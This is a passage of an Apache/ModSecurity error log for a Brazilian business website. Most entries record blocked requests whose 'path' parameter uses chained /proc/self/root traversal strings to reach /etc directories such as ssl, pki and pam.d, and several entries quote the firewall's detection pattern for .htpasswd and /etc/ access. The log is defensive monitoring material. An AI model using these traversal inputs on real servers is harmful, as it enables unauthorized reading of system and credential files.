"/"] [unique_id "abwQ88df6f5d65gmYZSBMQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:06:29.268722 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:36134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQ9cdf6f5d65gmYZSBNAAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 12:06:44.801109 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:38204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRBBkFeYa1D6dYQnD6SwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:06:47.679200 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.244.43:50774] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwRB1_V7PWP6ixUYl7FpQAAApQ"]
[Thu Mar 19 12:06:59.125784 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38458] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:07:05.666358 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:35108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRGAkwaGbbGflqUZDOSwAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:07:23.208022 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:39046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRKhkFeYa1D6dYQnD6XQAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:07:26.117830 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39292] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:07:33.956234 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.241.31:57084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRNQbLMZ6AikZjR9Vm0AAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:07:48.129867 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:07:55.655139 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.241.31:57084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRSwbLMZ6AikZjR9Vm4wAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:05.506871 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.241.31:33500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRVRkFeYa1D6dYQnD6fAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:10.133776 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:40544] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:08:10.461810 2026] [core:alert] [pid 31803:tid 140411607643904] [client 57.141.18.42:43430] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:08:14.831575 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:37812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRXta6ubjKNq_cu4ZfRwAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:22.635375 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:54020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRZv-YZRR_7pZ7nDKU2AAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:27.173328 2026] [mime_magic:error] [pid 30077:tid 140411548894976] (70014)End of file found: [client 57.141.18.67:44228] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:08:29.586436 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.241.31:38190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRbV_V7PWP6ixUYl7F3gAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:31.085861 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41058] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:08:31.891885 2026] [mime_magic:error] [pid 17887:tid 140411658000128] (70014)End of file found: [client 57.141.18.98:44158] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:08:35.531336 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:38204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRc8df6f5d65gmYZSBeAAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:40.175737 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.241.31:41814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwReF_V7PWP6ixUYl7F4gAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:42.510481 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:41826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwReuoXxyEfFpUF8f8XGQAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:44.145130 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:41836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRfAbLMZ6AikZjR9VnAgAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:52.649792 2026] [access_compat:error] [pid 26799:tid 140411565680384] [client 45.80.158.249:48294] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 12:08:52.703415 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:41838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRhAbLMZ6AikZjR9VnCwAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:54.152399 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41670] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:08:56.852716 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.241.31:52908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRiBkFeYa1D6dYQnD6kgAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:08:59.927427 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.241.31:56916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRiwbLMZ6AikZjR9VnEAAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:09:05.364599 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:56926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRkQkwaGbbGflqUZDOtQAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:09:07.619423 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:45924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRk-yqAr6etmhZHNppxgAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
